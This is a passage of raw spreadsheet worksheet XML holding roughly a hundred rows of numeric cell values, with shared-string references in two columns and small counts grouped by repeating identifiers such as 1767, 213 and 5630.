      <c r="C19442">
        <v>0</v>
      </c>
      <c r="D19442">
        <v>1768</v>
      </c>
    </row>
    <row r="19443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19443" t="s">
        <v>16228</v>
      </c>
      <c r="B19443" t="s">
        <v>16211</v>
      </c>
      <c r="C19443">
        <v>0</v>
      </c>
      <c r="D19443">
        <v>1767</v>
      </c>
    </row>
    <row r="19444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19444" t="s">
        <v>16231</v>
      </c>
      <c r="B19444" t="s">
        <v>16212</v>
      </c>
      <c r="C19444">
        <v>0</v>
      </c>
      <c r="D19444">
        <v>1767</v>
      </c>
    </row>
    <row r="19445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19445" t="s">
        <v>16228</v>
      </c>
      <c r="B19445" t="s">
        <v>16213</v>
      </c>
      <c r="C19445">
        <v>0</v>
      </c>
      <c r="D19445">
        <v>1767</v>
      </c>
    </row>
    <row r="19446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19446" t="s">
        <v>16231</v>
      </c>
      <c r="B19446" t="s">
        <v>16214</v>
      </c>
      <c r="C19446">
        <v>0</v>
      </c>
      <c r="D19446">
        <v>1767</v>
      </c>
    </row>
    <row r="19447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19447" t="s">
        <v>16228</v>
      </c>
      <c r="B19447" t="s">
        <v>16215</v>
      </c>
      <c r="C19447">
        <v>0</v>
      </c>
      <c r="D19447">
        <v>1767</v>
      </c>
    </row>
    <row r="19448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19448" t="s">
        <v>16231</v>
      </c>
      <c r="B19448" t="s">
        <v>16216</v>
      </c>
      <c r="C19448">
        <v>1</v>
      </c>
      <c r="D19448">
        <v>1767</v>
      </c>
    </row>
    <row r="19449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19449" t="s">
        <v>16228</v>
      </c>
      <c r="B19449" t="s">
        <v>16217</v>
      </c>
      <c r="C19449">
        <v>2</v>
      </c>
      <c r="D19449">
        <v>1767</v>
      </c>
    </row>
    <row r="19450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19450" t="s">
        <v>16231</v>
      </c>
      <c r="B19450" t="s">
        <v>16218</v>
      </c>
      <c r="C19450">
        <v>2</v>
      </c>
      <c r="D19450">
        <v>1767</v>
      </c>
    </row>
    <row r="19451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19451" t="s">
        <v>16229</v>
      </c>
      <c r="B19451" t="s">
        <v>16219</v>
      </c>
      <c r="C19451">
        <v>1</v>
      </c>
      <c r="D19451">
        <v>1767</v>
      </c>
    </row>
    <row r="19452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19452" t="s">
        <v>16230</v>
      </c>
      <c r="B19452" t="s">
        <v>16220</v>
      </c>
      <c r="C19452">
        <v>0</v>
      </c>
      <c r="D19452">
        <v>1767</v>
      </c>
    </row>
    <row r="19453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19453" t="s">
        <v>16229</v>
      </c>
      <c r="B19453" t="s">
        <v>16221</v>
      </c>
      <c r="C19453">
        <v>0</v>
      </c>
      <c r="D19453">
        <v>1767</v>
      </c>
    </row>
    <row r="19454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19454" t="s">
        <v>16230</v>
      </c>
      <c r="B19454" t="s">
        <v>16222</v>
      </c>
      <c r="C19454">
        <v>17</v>
      </c>
      <c r="D19454">
        <v>1767</v>
      </c>
    </row>
    <row r="19455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19455" t="s">
        <v>16223</v>
      </c>
      <c r="B19455" t="s">
        <v>16223</v>
      </c>
      <c r="C19455">
        <v>21</v>
      </c>
      <c r="D19455">
        <v>1767</v>
      </c>
    </row>
    <row r="19456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19456" t="s">
        <v>16224</v>
      </c>
      <c r="B19456" t="s">
        <v>16224</v>
      </c>
      <c r="C19456">
        <v>1</v>
      </c>
      <c r="D19456">
        <v>1767</v>
      </c>
    </row>
    <row r="19457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19457" t="s">
        <v>16228</v>
      </c>
      <c r="B19457" t="s">
        <v>16211</v>
      </c>
      <c r="C19457">
        <v>0</v>
      </c>
      <c r="D19457">
        <v>213</v>
      </c>
    </row>
    <row r="19458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19458" t="s">
        <v>16231</v>
      </c>
      <c r="B19458" t="s">
        <v>16212</v>
      </c>
      <c r="C19458">
        <v>0</v>
      </c>
      <c r="D19458">
        <v>213</v>
      </c>
    </row>
    <row r="19459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19459" t="s">
        <v>16228</v>
      </c>
      <c r="B19459" t="s">
        <v>16213</v>
      </c>
      <c r="C19459">
        <v>1</v>
      </c>
      <c r="D19459">
        <v>213</v>
      </c>
    </row>
    <row r="19460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19460" t="s">
        <v>16231</v>
      </c>
      <c r="B19460" t="s">
        <v>16214</v>
      </c>
      <c r="C19460">
        <v>0</v>
      </c>
      <c r="D19460">
        <v>213</v>
      </c>
    </row>
    <row r="19461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19461" t="s">
        <v>16228</v>
      </c>
      <c r="B19461" t="s">
        <v>16215</v>
      </c>
      <c r="C19461">
        <v>18</v>
      </c>
      <c r="D19461">
        <v>213</v>
      </c>
    </row>
    <row r="19462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19462" t="s">
        <v>16231</v>
      </c>
      <c r="B19462" t="s">
        <v>16216</v>
      </c>
      <c r="C19462">
        <v>5</v>
      </c>
      <c r="D19462">
        <v>213</v>
      </c>
    </row>
    <row r="19463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19463" t="s">
        <v>16228</v>
      </c>
      <c r="B19463" t="s">
        <v>16217</v>
      </c>
      <c r="C19463">
        <v>90</v>
      </c>
      <c r="D19463">
        <v>213</v>
      </c>
    </row>
    <row r="19464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19464" t="s">
        <v>16231</v>
      </c>
      <c r="B19464" t="s">
        <v>16218</v>
      </c>
      <c r="C19464">
        <v>0</v>
      </c>
      <c r="D19464">
        <v>213</v>
      </c>
    </row>
    <row r="19465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19465" t="s">
        <v>16229</v>
      </c>
      <c r="B19465" t="s">
        <v>16219</v>
      </c>
      <c r="C19465">
        <v>0</v>
      </c>
      <c r="D19465">
        <v>213</v>
      </c>
    </row>
    <row r="19466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19466" t="s">
        <v>16230</v>
      </c>
      <c r="B19466" t="s">
        <v>16220</v>
      </c>
      <c r="C19466">
        <v>0</v>
      </c>
      <c r="D19466">
        <v>213</v>
      </c>
    </row>
    <row r="19467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19467" t="s">
        <v>16229</v>
      </c>
      <c r="B19467" t="s">
        <v>16221</v>
      </c>
      <c r="C19467">
        <v>0</v>
      </c>
      <c r="D19467">
        <v>213</v>
      </c>
    </row>
    <row r="19468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19468" t="s">
        <v>16230</v>
      </c>
      <c r="B19468" t="s">
        <v>16222</v>
      </c>
      <c r="C19468">
        <v>0</v>
      </c>
      <c r="D19468">
        <v>213</v>
      </c>
    </row>
    <row r="19469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19469" t="s">
        <v>16223</v>
      </c>
      <c r="B19469" t="s">
        <v>16223</v>
      </c>
      <c r="C19469">
        <v>25</v>
      </c>
      <c r="D19469">
        <v>213</v>
      </c>
    </row>
    <row r="19470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19470" t="s">
        <v>16224</v>
      </c>
      <c r="B19470" t="s">
        <v>16224</v>
      </c>
      <c r="C19470">
        <v>1</v>
      </c>
      <c r="D19470">
        <v>213</v>
      </c>
    </row>
    <row r="19471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19471" t="s">
        <v>16228</v>
      </c>
      <c r="B19471" t="s">
        <v>16211</v>
      </c>
      <c r="C19471">
        <v>0</v>
      </c>
      <c r="D19471">
        <v>5630</v>
      </c>
    </row>
    <row r="19472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19472" t="s">
        <v>16231</v>
      </c>
      <c r="B19472" t="s">
        <v>16212</v>
      </c>
      <c r="C19472">
        <v>0</v>
      </c>
      <c r="D19472">
        <v>5630</v>
      </c>
    </row>
    <row r="19473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19473" t="s">
        <v>16228</v>
      </c>
      <c r="B19473" t="s">
        <v>16213</v>
      </c>
      <c r="C19473">
        <v>0</v>
      </c>
      <c r="D19473">
        <v>5630</v>
      </c>
    </row>
    <row r="19474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19474" t="s">
        <v>16231</v>
      </c>
      <c r="B19474" t="s">
        <v>16214</v>
      </c>
      <c r="C19474">
        <v>0</v>
      </c>
      <c r="D19474">
        <v>5630</v>
      </c>
    </row>
    <row r="19475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19475" t="s">
        <v>16228</v>
      </c>
      <c r="B19475" t="s">
        <v>16215</v>
      </c>
      <c r="C19475">
        <v>1</v>
      </c>
      <c r="D19475">
        <v>5630</v>
      </c>
    </row>
    <row r="19476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19476" t="s">
        <v>16231</v>
      </c>
      <c r="B19476" t="s">
        <v>16216</v>
      </c>
      <c r="C19476">
        <v>0</v>
      </c>
      <c r="D19476">
        <v>5630</v>
      </c>
    </row>
    <row r="19477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19477" t="s">
        <v>16228</v>
      </c>
      <c r="B19477" t="s">
        <v>16217</v>
      </c>
      <c r="C19477">
        <v>0</v>
      </c>
      <c r="D19477">
        <v>5630</v>
      </c>
    </row>
    <row r="19478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19478" t="s">
        <v>16231</v>
      </c>
      <c r="B19478" t="s">
        <v>16218</v>
      </c>
      <c r="C19478">
        <v>0</v>
      </c>
      <c r="D19478">
        <v>5630</v>
      </c>
    </row>
    <row r="19479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19479" t="s">
        <v>16229</v>
      </c>
      <c r="B19479" t="s">
        <v>16219</v>
      </c>
      <c r="C19479">
        <v>0</v>
      </c>
      <c r="D19479">
        <v>5630</v>
      </c>
    </row>
    <row r="19480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19480" t="s">
        <v>16230</v>
      </c>
      <c r="B19480" t="s">
        <v>16220</v>
      </c>
      <c r="C19480">
        <v>0</v>
      </c>
      <c r="D19480">
        <v>5630</v>
      </c>
    </row>
    <row r="19481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19481" t="s">
        <v>16229</v>
      </c>
      <c r="B19481" t="s">
        <v>16221</v>
      </c>
      <c r="C19481">
        <v>0</v>
      </c>
      <c r="D19481">
        <v>5630</v>
      </c>
    </row>
    <row r="19482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19482" t="s">
        <v>16230</v>
      </c>
      <c r="B19482" t="s">
        <v>16222</v>
      </c>
      <c r="C19482">
        <v>4</v>
      </c>
      <c r="D19482">
        <v>5630</v>
      </c>
    </row>
    <row r="19483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19483" t="s">
        <v>16223</v>
      </c>
      <c r="B19483" t="s">
        <v>16223</v>
      </c>
      <c r="C19483">
        <v>25</v>
      </c>
      <c r="D19483">
        <v>5630</v>
      </c>
    </row>
    <row r="19484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19484" t="s">
        <v>16224</v>
      </c>
      <c r="B19484" t="s">
        <v>16224</v>
      </c>
      <c r="C19484">
        <v>1</v>
      </c>
      <c r="D19484">
        <v>5630</v>
      </c>
    </row>
    <row r="19485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19485" t="s">
        <v>16228</v>
      </c>
      <c r="B19485" t="s">
        <v>16211</v>
      </c>
      <c r="C19485">
        <v>0</v>
      </c>
      <c r="D19485">
        <v>1851</v>
      </c>
    </row>
    <row r="19486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19486" t="s">
        <v>16231</v>
      </c>
      <c r="B19486" t="s">
        <v>16212</v>
      </c>
      <c r="C19486">
        <v>0</v>
      </c>
      <c r="D19486">
        <v>1851</v>
      </c>
    </row>
    <row r="19487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19487" t="s">
        <v>16228</v>
      </c>
      <c r="B19487" t="s">
        <v>16213</v>
      </c>
      <c r="C19487">
        <v>0</v>
      </c>
      <c r="D19487">
        <v>1851</v>
      </c>
    </row>
    <row r="19488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19488" t="s">
        <v>16231</v>
      </c>
      <c r="B19488" t="s">
        <v>16214</v>
      </c>
      <c r="C19488">
        <v>0</v>
      </c>
      <c r="D19488">
        <v>1851</v>
      </c>
    </row>
    <row r="19489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19489" t="s">
        <v>16228</v>
      </c>
      <c r="B19489" t="s">
        <v>16215</v>
      </c>
      <c r="C19489">
        <v>0</v>
      </c>
      <c r="D19489">
        <v>1851</v>
      </c>
    </row>
    <row r="19490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19490" t="s">
        <v>16231</v>
      </c>
      <c r="B19490" t="s">
        <v>16216</v>
      </c>
      <c r="C19490">
        <v>1</v>
      </c>
      <c r="D19490">
        <v>1851</v>
      </c>
    </row>
    <row r="19491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19491" t="s">
        <v>16228</v>
      </c>
      <c r="B19491" t="s">
        <v>16217</v>
      </c>
      <c r="C19491">
        <v>0</v>
      </c>
      <c r="D19491">
        <v>1851</v>
      </c>
    </row>
    <row r="19492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19492" t="s">
        <v>16231</v>
      </c>
      <c r="B19492" t="s">
        <v>16218</v>
      </c>
      <c r="C19492">
        <v>6</v>
      </c>
      <c r="D19492">
        <v>1851</v>
      </c>
    </row>
    <row r="19493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19493" t="s">
        <v>16229</v>
      </c>
      <c r="B19493" t="s">
        <v>16219</v>
      </c>
      <c r="C19493">
        <v>0</v>
      </c>
      <c r="D19493">
        <v>1851</v>
      </c>
    </row>
    <row r="19494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19494" t="s">
        <v>16230</v>
      </c>
      <c r="B19494" t="s">
        <v>16220</v>
      </c>
      <c r="C19494">
        <v>0</v>
      </c>
      <c r="D19494">
        <v>1851</v>
      </c>
    </row>
    <row r="19495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19495" t="s">
        <v>16229</v>
      </c>
      <c r="B19495" t="s">
        <v>16221</v>
      </c>
      <c r="C19495">
        <v>0</v>
      </c>
      <c r="D19495">
        <v>1851</v>
      </c>
    </row>
    <row r="19496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19496" t="s">
        <v>16230</v>
      </c>
      <c r="B19496" t="s">
        <v>16222</v>
      </c>
      <c r="C19496">
        <v>0</v>
      </c>
      <c r="D19496">
        <v>1851</v>
      </c>
    </row>
    <row r="19497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19497" t="s">
        <v>16223</v>
      </c>
      <c r="B19497" t="s">
        <v>16223</v>
      </c>
      <c r="C19497">
        <v>5</v>
      </c>
      <c r="D19497">
        <v>1851</v>
      </c>
    </row>
    <row r="19498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19498" t="s">
        <v>16224</v>
      </c>
      <c r="B19498" t="s">
        <v>16224</v>
      </c>
      <c r="C19498">
        <v>0</v>
      </c>
      <c r="D19498">
        <v>1851</v>
      </c>
    </row>
    <row r="19499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19499" t="s">
        <v>16228</v>
      </c>
      <c r="B19499" t="s">
        <v>16211</v>
      </c>
      <c r="C19499">
        <v>0</v>
      </c>
      <c r="D19499">
        <v>5626</v>
      </c>
    </row>
    <row r="19500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19500" t="s">
        <v>16231</v>
      </c>
      <c r="B19500" t="s">
        <v>16212</v>
      </c>
      <c r="C19500">
        <v>1</v>
      </c>
      <c r="D19500">
        <v>5626</v>
      </c>
    </row>
    <row r="19501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19501" t="s">
        <v>16228</v>
      </c>
      <c r="B19501" t="s">
        <v>16213</v>
      </c>
      <c r="C19501">
        <v>1</v>
      </c>
      <c r="D19501">
        <v>5626</v>
      </c>
    </row>
    <row r="19502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19502" t="s">
        <v>16231</v>
      </c>
      <c r="B19502" t="s">
        <v>16214</v>
      </c>
      <c r="C19502">
        <v>0</v>
      </c>
      <c r="D19502">
        <v>5626</v>
      </c>
    </row>
    <row r="19503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19503" t="s">
        <v>16228</v>
      </c>
      <c r="B19503" t="s">
        <v>16215</v>
      </c>
      <c r="C19503">
        <v>2</v>
      </c>
      <c r="D19503">
        <v>5626</v>
      </c>
    </row>
    <row r="19504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19504" t="s">
        <v>16231</v>
      </c>
      <c r="B19504" t="s">
        <v>16216</v>
      </c>
      <c r="C19504">
        <v>3</v>
      </c>
      <c r="D19504">
        <v>5626</v>
      </c>
    </row>
    <row r="19505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19505" t="s">
        <v>16228</v>
      </c>
      <c r="B19505" t="s">
        <v>16217</v>
      </c>
      <c r="C19505">
        <v>3</v>
      </c>
      <c r="D19505">
        <v>5626</v>
      </c>
    </row>
    <row r="19506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19506" t="s">
        <v>16231</v>
      </c>
      <c r="B19506" t="s">
        <v>16218</v>
      </c>
      <c r="C19506">
        <v>0</v>
      </c>
      <c r="D19506">
        <v>5626</v>
      </c>
    </row>
    <row r="19507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19507" t="s">
        <v>16229</v>
      </c>
      <c r="B19507" t="s">
        <v>16219</v>
      </c>
      <c r="C19507">
        <v>0</v>
      </c>
      <c r="D19507">
        <v>5626</v>
      </c>
    </row>
    <row r="19508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19508" t="s">
        <v>16230</v>
      </c>
      <c r="B19508" t="s">
        <v>16220</v>
      </c>
      <c r="C19508">
        <v>0</v>
      </c>
      <c r="D19508">
        <v>5626</v>
      </c>
    </row>
    <row r="19509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19509" t="s">
        <v>16229</v>
      </c>
      <c r="B19509" t="s">
        <v>16221</v>
      </c>
      <c r="C19509">
        <v>45</v>
      </c>
      <c r="D19509">
        <v>5626</v>
      </c>
    </row>
    <row r="19510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19510" t="s">
        <v>16230</v>
      </c>
      <c r="B19510" t="s">
        <v>16222</v>
      </c>
      <c r="C19510">
        <v>15</v>
      </c>
      <c r="D19510">
        <v>5626</v>
      </c>
    </row>
    <row r="19511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19511" t="s">
        <v>16223</v>
      </c>
      <c r="B19511" t="s">
        <v>16223</v>
      </c>
      <c r="C19511">
        <v>24</v>
      </c>
      <c r="D19511">
        <v>5626</v>
      </c>
    </row>
    <row r="19512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19512" t="s">
        <v>16224</v>
      </c>
      <c r="B19512" t="s">
        <v>16224</v>
      </c>
      <c r="C19512">
        <v>3</v>
      </c>
      <c r="D19512">
        <v>5626</v>
      </c>
    </row>
    <row r="19513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19513" t="s">
        <v>16228</v>
      </c>
      <c r="B19513" t="s">
        <v>16211</v>
      </c>
      <c r="C19513">
        <v>0</v>
      </c>
      <c r="D19513">
        <v>5501</v>
      </c>
    </row>
    <row r="19514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19514" t="s">
        <v>16231</v>
      </c>
      <c r="B19514" t="s">
        <v>16212</v>
      </c>
      <c r="C19514">
        <v>0</v>
      </c>
      <c r="D19514">
        <v>5501</v>
      </c>
    </row>
    <row r="19515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19515" t="s">
        <v>16228</v>
      </c>
      <c r="B19515" t="s">
        <v>16213</v>
      </c>
      <c r="C19515">
        <v>0</v>
      </c>
      <c r="D19515">
        <v>5501</v>
      </c>
    </row>
    <row r="19516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19516" t="s">
        <v>16231</v>
      </c>
      <c r="B19516" t="s">
        <v>16214</v>
      </c>
      <c r="C19516">
        <v>0</v>
      </c>
      <c r="D19516">
        <v>5501</v>
      </c>
    </row>
    <row r="19517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19517" t="s">
        <v>16228</v>
      </c>
      <c r="B19517" t="s">
        <v>16215</v>
      </c>
      <c r="C19517">
        <v>3</v>
      </c>
      <c r="D19517">
        <v>5501</v>
      </c>
    </row>
    <row r="19518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19518" t="s">
        <v>16231</v>
      </c>
      <c r="B19518" t="s">
        <v>16216</v>
      </c>
      <c r="C19518">
        <v>1</v>
      </c>
      <c r="D19518">
        <v>5501</v>
      </c>
    </row>
    <row r="19519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19519" t="s">
        <v>16228</v>
      </c>
      <c r="B19519" t="s">
        <v>16217</v>
      </c>
      <c r="C19519">
        <v>3</v>
      </c>
      <c r="D19519">
        <v>5501</v>
      </c>
    </row>
    <row r="19520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19520" t="s">
        <v>16231</v>
      </c>
      <c r="B19520" t="s">
        <v>16218</v>
      </c>
      <c r="C19520">
        <v>0</v>
      </c>
      <c r="D19520">
        <v>5501</v>
      </c>
    </row>
    <row r="19521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19521" t="s">
        <v>16229</v>
      </c>
      <c r="B19521" t="s">
        <v>16219</v>
      </c>
      <c r="C19521">
        <v>0</v>
      </c>
      <c r="D19521">
        <v>5501</v>
      </c>
    </row>
    <row r="19522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19522" t="s">
        <v>16230</v>
      </c>
      <c r="B19522" t="s">
        <v>16220</v>
      </c>
      <c r="C19522">
        <v>0</v>
      </c>
      <c r="D19522">
        <v>5501</v>
      </c>
    </row>
    <row r="19523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19523" t="s">
        <v>16229</v>
      </c>
      <c r="B19523" t="s">
        <v>16221</v>
      </c>
      <c r="C19523">
        <v>0</v>
      </c>
      <c r="D19523">
        <v>5501</v>
      </c>
    </row>
    <row r="19524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19524" t="s">
        <v>16230</v>
      </c>
      <c r="B19524" t="s">
        <v>16222</v>
      </c>
      <c r="C19524">
        <v>5</v>
      </c>
      <c r="D19524">
        <v>5501</v>
      </c>
    </row>
    <row r="19525" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19525" t="s">
        <v>16223</v>
      </c>
      <c r="B19525" t="s">
        <v>16223</v>
      </c>
      <c r="C19525">
        <v>6</v>
      </c>
      <c r="D19525">
        <v>5501</v>
      </c>
    </row>
    <row r="19526" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19526" t="s">
        <v>16224</v>
      </c>
      <c r="B19526" t="s">
        <v>16224</v>
      </c>
      <c r="C19526">
        <v>0</v>
      </c>
      <c r="D19526">
        <v>5501</v>
      </c>
    </row>
    <row r="19527" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19527" t="s">
        <v>16228</v>
      </c>
      <c r="B19527" t="s">
        <v>16211</v>
      </c>
      <c r="C19527">
        <v>0</v>
      </c>
      <c r="D19527">
        <v>1446</v>
      </c>
    </row>
    <row r="19528" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19528" t="s">
        <v>16231</v>
      </c>
      <c r="B19528" t="s">
        <v>16212</v>
      </c>
      <c r="C19528">
        <v>0</v>
      </c>
      <c r="D19528">
        <v>1446</v>
      </c>
    </row>
    <row r="19529" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19529" t="s">
        <v>16228</v>
      </c>
      <c r="B19529" t="s">
        <v>16213</v>
      </c>
      <c r="C19529">
        <v>0</v>
      </c>
      <c r="D19529">
        <v>1446</v>
      </c>
    </row>
    <row r="19530" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19530" t="s">
        <v>16231</v>
      </c>
      <c r="B19530" t="s">
        <v>16214</v>
      </c>
      <c r="C19530">
        <v>0</v>
      </c>
      <c r="D19530">
        <v>1446</v>
      </c>
    </row>
    <row r="19531" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19531" t="s">
        <v>16228</v>
      </c>
      <c r="B19531" t="s">
        <v>16215</v>
      </c>
      <c r="C19531">
        <v>0</v>
      </c>
      <c r="D19531">
        <v>1446</v>
      </c>
    </row>
    <row r="19532" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19532" t="s">
        <v>16231</v>
      </c>
      <c r="B19532" t="s">
        <v>16216</v>
      </c>
      <c r="C19532">
        <v>1</v>
      </c>
      <c r="D19532">
        <v>1446</v>
      </c>
    </row>
    <row r="19533" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19533" t="s">
        <v>16228</v>
      </c>
      <c r="B19533" t="s">
        <v>16217</v>
      </c>
      <c r="C19533">
        <v>2</v>
      </c>
      <c r="D19533">
        <v>1446</v>
      </c>
    </row>
    <row r="19534" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19534" t="s">
        <v>16231</v>
      </c>
      <c r="B19534" t="s">
        <v>16218</v>
      </c>
      <c r="C19534">
        <v>0</v>
      </c>
      <c r="D19534">
        <v>1446</v>
      </c>
    </row>
    <row r="19535" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19535" t="s">
        <v>16229</v>
      </c>
      <c r="B19535" t="s">
        <v>16219</v>
      </c>
      <c r="C19535">
        <v>0</v>
      </c>
      <c r="D19535">
        <v>1446</v>
      </c>
    </row>
    <row r="19536" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19536" t="s">
        <v>16230</v>
      </c>
      <c r="B19536" t="s">
        <v>16220</v>
      </c>
      <c r="C19536">
        <v>0</v>
      </c>
      <c r="D19536">
        <v>1446</v>
      </c>
    </row>
    <row r="19537" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19537" t="s">
        <v>16229</v>
      </c>
      <c r="B19537" t="s">
        <v>16221</v>
      </c>
      <c r="C19537">
        <v>0</v>
      </c>
      <c r="D19537">
        <v>1446</v>
      </c>
    </row>
    <row r="19538" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19538" t="s">
        <v>16230</v>
      </c>
      <c r="B19538" t="s">
        <v>16222</v>
      </c>
      <c r="C19538">
        <v>0</v>
      </c>
      <c r="D19538">
        <v>1446</v>
      </c>
    </row>
    <row r="19539" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19539" t="s">
        <v>16223</v>
      </c>
      <c r="B19539" t="s">
        <v>16223</v>
      </c>
      <c r="C19539">
        <v>5</v>
      </c>
      <c r="D19539">
        <v>1446</v>
      </c>
    </row>
    <row r="19540" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19540" t="s">
        <v>16224</v>
      </c>
      <c r="B19540" t="s">
        <v>16224</v>
      </c>
      <c r="C19540">
        <v>1</v>
      </c>
      <c r="D19540">
        <v>1446</v>
      </c>
    </row>
    <row r="19541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19541" t="s">
        <v>16228</v>
      </c>
      <c r="B19541" t="s">
        <v>16211</v>
      </c>
      <c r="C19541">
        <v>0</v>
      </c>
      <c r="D19541">
        <v>1863</v>
      </c>
    </row>
    <row r="19542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19542" t="s">
        <v>16231</v>
      </c>
      <c r="B19542" t="s">
        <v>16212</v>
      </c>
      <c r="C19542">
        <v>0</v>
      </c>
      <c r="D19542">
        <v>1863</v>
      </c>
    </row>
    <row r="19543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19543" t="s">
        <v>16228</v>
      </c>
      <c r="B19543" t="s">
        <v>16213</v>
      </c>
      <c r="C19543">
        <v>0</v>
      </c>
      <c r="D19543">
        <v>1863</v>
      </c>
    </row>
    <row r="19544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19544" t="s">
        <v>16231</v>
      </c>
      <c r="B19544" t="s">
        <v>16214</v>
      </c>
      <c r="C19544">
        <v>0</v>
      </c>
      <c r="D19544">
        <v>1863</v>
      </c>
    </row>
    <row r="19545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19545" t="s">
        <v>16228</v>
      </c>
      <c r="B19545" t="s">
        <v>16215</v>
      </c>
      <c r="C19545">
        <v>8</v>
      </c>
      <c r="D19545">
        <v>1863</v>
      </c>
    </row>
    <row r="19546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19546" t="s">
        <v>16231</v>
      </c>
      <c r="B19546" t="s">
        <v>16216</v>
      </c>
      <c r="C19546">
        <v>8</v>
      </c>
      <c r="D19546">
        <v>1863</v>
      </c>
    </row>
    <row r="19547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19547" t="s">
        <v>16228</v>
      </c>
      <c r="B19547" t="s">
        <v>16217</v>
